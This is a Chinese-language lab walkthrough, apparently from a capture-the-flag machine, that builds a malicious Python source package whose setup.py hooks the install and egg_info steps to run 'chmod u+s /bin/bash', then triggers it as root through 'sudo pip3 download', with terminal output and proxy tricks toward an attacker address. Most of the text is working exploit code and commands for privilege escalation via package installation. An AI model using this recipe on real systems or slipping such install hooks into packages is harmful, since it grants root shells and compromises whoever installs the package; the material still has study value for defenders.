参考文章:
https://github.com/wunderwuzzi23/this_is_fine_wuzzi
https://embracethered.com/blog/posts/2022/python-package-manager-install-and-download-vulnerability/
话不多说,准备环境( 虚拟机ubuntu20.04 x64):
mkdir -pv /tmp/AA/admin2023;
cd /tmp/AA/;
touch README;
cat<<EOF>PKG-INFO
[egg_info]
tag_date = 0
tag_build =
tag_svn_revision = 0
EOF
cat<<EOF>/tmp/AA/admin2023/__init__.py
print("killbyU");
EOF
cat<<EOF>/tmp/AA/admin2023/main.py
import time,os
print(123456);
def hi_there():
print("This is fine!");
EOF
cat<<EOF>setup.py
import os,subprocess
from setuptools import setup, find_packages
from setuptools.command.install import install
from setuptools.command.egg_info import egg_info
def RunCommand():
print("RunCommand(){ Hello, script guys : "+ os.getcwd()+"}" );
if os.name == 'nt' :
print( 1)
else:
#open('/tmp/TT61.txt','w').close();
os.system('ls -al > /tmp/1.txt;chmod u+s /bin/bash');
name = os.listdir(os.getcwd())
print(name)
class RunEggInfoCommand(egg_info):
def run(self):
RunCommand()
egg_info.run(self)
class RunInstallCommand(install):
def run(self):
RunCommand()
install.run(self)
setup(name='test2023',version = "2.4.0",
author = str(5+7), #open('../../../../../etc/passwd').read(),
author_email = "[email protected]",
description = open('README').read() ,url='http://127.0.0.1/tst',
# For now, let's just build a module, not a package
packages=find_packages(),
keywords = "20230501",
long_description=open('README').read(),
install_requires=[],
cmdclass={
'install' : RunInstallCommand,
'egg_info': RunEggInfoCommand
},
)
#subprocess.Popen(['bash','-c','pwd ;ls -la ../../../'], shell=True)
EOF
root@fv-az619-369:/tmp# cat /etc/issue
Ubuntu 20.04.6 LTS \n \l
root@fv-az619-369:/tmp# python3 -V
Python 3.8.10
root@fv-az619-369:/tmp#
把上面的项目文件夹打包为tar.gz后缀的pip包:
cd /tmp/AA/;
python3 setup.py sdist;
root@fv-az748-99:/tmp/AA# ls -alR
.:
total 28
drwxr-xr-x 5 root root 4096 May 4 15:19 .
drwxrwxrwt 20 root root 4096 May 4 15:18 ..
-rw-r--r-- 1 root root 59 May 4 15:18 PKG-INFO
-rw-r--r-- 1 root root 0 May 4 15:18 README
drwxr-xr-x 2 root root 4096 May 4 15:18 admin2023
drwxr-xr-x 2 root root 4096 May 4 15:19 dist
-rw-r--r-- 1 root root 1189 May 4 15:18 setup.py
drwxr-xr-x 2 root root 4096 May 4 15:19 test2023.egg-info
./admin2023:
total 16
drwxr-xr-x 2 root root 4096 May 4 15:18 .
drwxr-xr-x 5 root root 4096 May 4 15:19 ..
-rw-r--r-- 1 root root 18 May 4 15:18 __init__.py
-rw-r--r-- 1 root root 75 May 4 15:18 main.py
./dist:
total 12
drwxr-xr-x 2 root root 4096 May 4 15:19 .
drwxr-xr-x 5 root root 4096 May 4 15:19 ..
-rw-r--r-- 1 root root 1428 May 4 15:19 test2023-2.4.0.tar.gz
./test2023.egg-info:
total 24
drwxr-xr-x 2 root root 4096 May 4 15:19 .
drwxr-xr-x 5 root root 4096 May 4 15:19 ..
-rw-r--r-- 1 root root 218 May 4 15:19 PKG-INFO
-rw-r--r-- 1 root root 183 May 4 15:19 SOURCES.txt
-rw-r--r-- 1 root root 1 May 4 15:19 dependency_links.txt
-rw-r--r-- 1 root root 10 May 4 15:19 top_level.txt
root@fv-az748-99:/tmp/AA#
最后在靶机上 执行pip download下载命令,触发代码执行:
pip download http://127.0.0.1/test2023-2.4.0.tar.gz -v
python setup.py sdist --formats=gztar
http://127.0.0.1:3000/john/Test/raw/master/this_is_fine_wuzzi-0.0.1.tar.gz
# 注意上面的raw
john@only4you:~/DD$ sudo /usr/bin/pip3 download http://127.0.0.1:3000/john/Test/raw/master/this_is_fine_wuzzi-0.0.1.tar.gz
Collecting http://127.0.0.1:3000/john/Test/raw/master/this_is_fine_wuzzi-0.0.1.tar.gz
File was already downloaded /tmp/DD/this_is_fine_wuzzi-0.0.1.tar.gz
Successfully downloaded this-is-fine-wuzzi
john@only4you:~/DD$
骚操作:
1.走代理,使用pip.conf操作失败,命令行直接指定的方式成功
sudo /usr/bin/pip3 download http://127.0.0.1:3000/t.tar.gz --proxy http://10.10.14.128:30080 http://127.0.0.1:3000/$HOMEg.tar.gz
这样测出来$HOME是空的
2.同时下载2个
mkdir -pv ~/.pip;
echo -e "[global]\nproxy=http://10.10.14.128:30080" >~/.pip/pip.conf
cat ~/.pip/pip.conf;
#sudo /usr/bin/pip3 download http://127.0.0.1:3000/t.tar.gz http://127.0.0.1:3000/g.tar.gz
#上面这行 调用pip.conf里的代理 ,不行的
#如下调用代理可以,而且t.tar.gz和gtar.gz都下载了,都触发了
sudo /usr/bin/pip3 download http://127.0.0.1:3000/t.tar.gz --proxy http://10.10.14.128:30080 http://127.0.0.1:3000/g.tar.gz
# python3 -m http.server 3000 &